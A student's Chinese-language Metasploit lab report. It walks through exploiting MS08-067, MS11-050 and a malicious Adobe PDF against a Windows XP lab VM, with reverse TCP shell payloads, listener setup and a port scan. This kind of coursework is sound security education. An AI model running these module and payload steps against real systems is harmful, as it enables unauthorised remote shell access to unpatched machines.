zoukankan      html  css  js  c++  java
  • 20145201李子璇 《网络对抗》MSF基础应用

    实践报告

    MS08_067漏洞渗透攻击实践

    • 前期准备
      kali和winxp要ping通

    • kali开启msfconsole;

    同时在这里可以看到目前可攻击载荷个数一共是471个,也可以看到其他攻击的数量如图。

    • 用命令search ms08_067,查找渗透模块:

    • 输入命令use exploit/windows/smb/ms08_067_netapi 后,就可以使用这个模块啦

    • show target可以看到可攻击靶机的操作系统型号

      show payload可以看到有效的攻击载荷 为了和其他同学有所区分 我选择“windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager”,使用反向TCP shell,这个有效载荷会执行cmd.exe并通过连接回传,达到“远程访问”的目的。攻击效果中等难度

    • 使用命令set payload windows/shell/reverse_tcp设置有关参数,并查看

    • 确认无误后,用exploit命令开始攻击,成功获取权限

    • 可以在winxp C盘下新建一个带有学号20145201的文件夹,之后再kali中查看,该文件夹存在

    MS11_050漏洞渗透攻击实践

    -和之前一样kali攻击机和winxp靶机要ping通(真心是通的..不截图了);

    • kali中开启msfconsole;

    • 因为这次做的是ms11_050漏洞攻击,命令use windows/browser/ms11_050_mshtml_cobjectelement,使用该模块;

      info即可查看关于该漏洞的信息

    • 设置对应的载荷set payload windows/shell_reverese_tcp;

    • exploit,靶机访问的ip地址如图:

    • 靶机IE浏览器输入网址,出现了一些奇怪的符号之后建立成了~地址根据我刚刚的设置应该是: htt://192.168.134.129/lzx

    • 之后简单粗暴获取权限..

    Adobe阅读器渗透攻击

    • kali攻击机和winxp靶机要ping通;

    • 由于之后生成的pdf在隐藏文件夹下,故在kali下打开显示隐藏文件,如下图:

    • kali开启msfconsole;

    • use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用。

    • 用命令set payload windows/shell_reverse_tcp和之前一样设置参数;
      和之前唯一不同的是,用命令set FILENAME 20145201.pdf来设置生成pdf的文件名

    • 用命令exploit,生成pdf文件,根据显示的位置找到pdf文件,并复制到靶机里;

    • 用命令back退出当前模块,并用命令use exploit/multi/handler建立一个监听模块,参数设置要和之前的一样;

    • exploit后,在xp中打开pdf,结果如下:

      可以看到已经获取的靶机权限,20145201.pdf的文件是存在的~

    • 在靶机中用命令netstat -an,可以看到kali攻击机和靶机之间是有tcp连接的。

    辅助模块应用(auxiliary/scanner/portscan/tcp)

    • 创建msf所需的数据库
      之前我们开启msf时下面总会出现一个红色的小减号,原来是因为没有和数据库键连接,于是首先我们要手动建立一个数据库...
      使用命令来实现:
    service postgresql start
    msfdb start
    

    • 之后开启msf

    • 在查看可以应用的辅助模块后,我选择使用auxiliary/scanner/portscan/tcp模块,用来扫描靶机的TCP端口使用情况;
      执行命令use auxiliary/scanner/portscan/tcp进入并使用模块;

    • show options查看需要设置的参数信息,设置winxp的ip为RHOST

    • run开启扫描,可以看到在winxp靶机上所有tcp端口的使用情况(这时扫描还没完成..我先截了个图~)

    问题回答

    用自己的话解释什么是exploit,payload,encode.

    • exploit即为漏洞利用,是一个攻击过程,我们做实验时一些列步骤之后,最后一步就是exploit。
    • payload载荷 顾名思义“载”的是我们执行攻击利用的代码等。
    • encode编码 可以是对代码的一种编码 来防止之前的恶意代码被识破。

    实验体会

    这次实验是msf基本应用,利用各种系统的漏洞来进行攻击。做下来,感觉基本的套路都是一样的,弄明白其中一个模块后,其他的都根据options来一一设置就好,感觉很高大上啊。当然电脑卡不卡决定了这次实验所花的时间(๑•ᴗ•๑)然后就是,每次我电脑开机后360安全卫士总是在右下角冒出红色框框来让我下载安装什么补丁来修复漏洞,这令我很纠结啊,因为感觉会捆绑一些别的东西,在我电脑上神不知鬼不觉的开一些后门弄几个恶意代码进来之类的...于是每次选的都是放弃修复...不过 现在好像有点改变主意了

  • 相关阅读:
    JAVA 数据结构(14):LIST(一)Java ArrayList
    JAVA 数据结构(13):数据结构主要种接口和类
    数据可视化基础专题(51):NUMPY基础(16)numpy 函数 (五)线性代数
    数据可视化基础专题(50):NUMPY基础(15)numpy 函数 (四)排序、条件刷选函数
    数据可视化基础专题(49):NUMPY基础(14)numpy 函数 (三)统计函数
    数据可视化基础专题(48):NUMPY基础(13)numpy 函数 (二)数学函数
    数据可视化基础专题(47):NUMPY基础(12)numpy 函数 (一)字符串函数
    数据可视化基础专题(46):NUMPY基础(11)数组操作(3) 分割数组/数组元素的添加与删除
    数据可视化基础专题(45):NUMPY基础(10)数组操作(2) 修改数组维度/连接数组
    数据可视化基础专题(44):NUMPY基础(9)数组操作(1)修改数组形状/翻转数组
  • 原文地址:https://www.cnblogs.com/20145201lzx/p/6696251.html
Copyright © 2011-2022 走看看